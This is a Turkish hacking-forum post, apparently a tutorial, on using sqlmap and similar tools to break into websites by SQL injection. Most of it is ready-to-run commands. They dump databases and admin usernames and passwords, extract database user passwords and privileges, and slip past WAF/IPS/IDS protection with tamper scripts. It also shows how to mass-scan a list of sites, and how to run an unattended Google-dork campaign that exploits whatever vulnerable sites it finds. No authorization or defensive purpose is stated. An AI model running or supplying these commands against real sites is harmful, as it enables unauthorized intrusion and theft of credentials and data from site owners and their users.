Sqlmap Dev Kod Paylaşımı (1 Viewer)

Joined
Mar 29, 2020
Credits
0
Rating - 0%
Bilgileri çekmek için bir çok program kullanabilirsiz tabi ama ben bir kaçına değineceğim.

SQL Map ---------------------------// Sql'in babası
Havij -------------------------------// Hızlı ve kolay kullanım
Sql-i Scanner----------------------// Toplu bir şekilde test et
Grennox -------------------------- // Bonus
-o çıktı.log


1-) SQLMAP
?
Daha yavaş ama kesin çözümler arıyorsanız tam sizlik. Python dili ile yazılmıştır. Komut satırında çalışır. Sistem ortam değişkenlerine pythonu eklemelisiniz. Eklemezseniz cmd üzerinde python çalışmayacaktır.
Programı masaüstünde düşünerek bu kodları yazıyorum.



Masaüstüne geçelim
Code:
cd Desktop

Klasöre girelim.
Code:
cd sqlmap

programı python ile çalıştıralım.
Code:
python sqlmap.py

Bu kısma kadar programımızı açtık. Şimdi uzatmadan komutları sizlerle paylaşıcam.



Code:
python sqlmap.py -u www.site.com/index.php?id=2 --dbs [Dataları listeler. (1.bölümde anlatmıştım)]


python sqlmap.py -u www.site.com/index.php?id=2 -D data --tables [Seçilen datadaki tabloları listeler.]

python sqlmap.py -u www.site.com/index.php?id=2 -D data -T tablo1 --columns [Seçilen tablonun kolonlarını listeler]


python sqlmap.py -u www.site.com/index.php?id=2 -D data -T tablo1 -C admin_user,admin_pass --dump [Kolondaki seçilen bilgileri alır.]

python sqlmap.py -u www.site.com/index.php?id=2 -D data --dump all [Data Dosyasını Olduğu gibi İndirir.]

SQL İNJ Waff Bypass(Güvenlik atlatma yetkilendirme)?

Buraya kadar bilgileri almayı öğrendik. Bağlı olduğumuz veri tabanı kullanıcısının gerekli izinlere sahip olması gerekir.
Bunların kontrolünü sağlamada kullanabileceğimiz birkaç parametre mevcut. Veri tabanı kullanıcılarını öğrenebilmek
için --users parametresini, kullanıcıların parolaları için --passwords parametresini, kullanıcı yetkileri için --privileges
parametresini ve kullanıcı rolleri için ise --roles parametresini kullanabiliriz. Aksi takdirde;
Bağlantı kopma sorunu gibi problemlerle karşılaşırız böylece güvenlik yazılımlarının azizliğine uğramış oluruz.
Hadi bunların önüne geçelim.
--users --passwords --privileges --roles
--dbms=mysql

Level ve risk seviyesini arttırabilirsiniz.Söz konusu parametreler sqlmap’in hangi testleri yapacağını belirtir.
Ön tanımlı olarak --level parametresi 1 olarak gelir ve 1-5 arası değer alabilir. --risk parametresinin
varsayılan değeri 1’dir ve 1-3 arası değer alabilir.

Code:
sqlmap -u www.site.com/index.php?id=2 --risk=3 --level=3 --dbms=mysql --is-dba --users --privileges --roles
[11:36:30] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[11:36:30] [CRITICAL] heuristics detected that the target is protected by some kind of WAF/IPS/IDS
Gibi ekrana görüntüler geliyorsa. Waff/IPS/IDS bypass işlemi başlatmalıyız.
Code:
sqlmap -u "http:/www.site.com/main.php?id=test" --tamper="space2mysqlblank.py"
Manuel olarak daha ayrıntılı bir WAF testi yapmak için --identify-waf parametresinden yararlanabiliriz.
SQLmap klasöründe bir sürü tamper var. Açıkcası bende hepsini bilmiyorum.

userdb_80598_3
Risk ve level değerlerini artırdığınızda yapılan testlerin sayısı artar. Bu testleri bir nebze olsun hızlandırabilmek
için --threads parametresini kullanırız. Bu parametreyle eş zamanlı bağlantı sayısını değiştirmemiz mümkün.
Varsayılan değeri 1 iken daha fazla payload’un eş zamanlı olarak test edilmesini sağlamak için 10 değerini verebiliriz.
Ek olarak --eta parametresiyle, yapılan işlemler için tahmini bitiş süresi bir progress satırı şeklinde ekrana yansıtılmaktadır.

Ayriyetten bir txt dosyasındaki siteleride sırayla taratabiliriz. Sqlmap’in -m parametresiyle birden fazla URL’in taratılması mümkündür. Örneğin aşağıdaki gibi bir içeriğe sahip linkler.txt dosyasında bulunan URL’ler sqlmap ile taratılabilir text doyamız böyle olsun;
-------------------------------------------------------------
xx.com/index.php?id=2 l
bacıkırbaçlıyan.org/fetiş.php?id=3 l
kudurdum.com/pages.php?id=65 l
-------------------------------------------------------------

Code:
sqlmap -m "C:\Users\tokikolik\Desktop\siteler.txt"
Kodu ile taratabiliriz. Arkadaşlar özellikle --batch ile başlayan parametreler.

Ayrıca arkadaşlar şunuda belirtmeden gecmek istemedim Diyelimki Bilgisayar başında değilsiniz Sizin Sqlmap otomatik olarak tarama yapmasını isterseniz bu codu kullana bilirsiniz bir sitenin datasına ulaşana kadar herşeyi kendi yapabilir.

sqlmap.py -g 'inurl:"event.php?id="' --random-agent --batch --answer="extending=N,follow=N,keep=N,exploit=Y" --dbs --thread 5 --level=3 --risk=3

--user-agent="Googlebot (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

Code:
--batch: Bu parametre ile sqlmap’in sorduğu sorulara otomatik olarak varsayılan cevabı vermiş oluruz.
--answer: --answer="quit=N,follow=N" gibi bir kullanımla söz konusu sorularla karşılaşıldığında otomatik olarak istediğimiz cevapların verilmesini istedik.
--mobile: Mobil bir hedefe yaptığımız saldırı, hedef tarafından uygun User-Agent’ı bulundurmadığımız için engellenebilir. Bu parametreyle sqlmap testlerini bir mobil client gibi tanıtıyoruz.
-v: Varsayılan değeri 1’dir. 0-6 arası değer verebiliriz. Bu parametre ile testler sırasında oluşan logları sqlmap ekranın görmemiz mümkün hale geliyor.
-t: Tüm HTTP trafiğini ekrana yansıtmak yerine belirlediğimiz bir metin dosyasına aktarır.
--force-ssl: HTTPS isteği yaparken bu parametreyi kullanabilirsiniz. Alternatif olarak Host adresinin sonuna 443 port numarası da eklenebilir.
--threads : Data'lar başlıkları uzunsa işinizi kolaylaştıracaktır.
--version: Mevcut sqlmap sürümünü ekrana yansıtır.
--update: Sqlmap’i otomatik olarak günceller. Windows sistemlerde çalışmamaktadır. Güncellemeyi manuel olarak yapmak gerekir.
 

Users who are viewing this thread

Top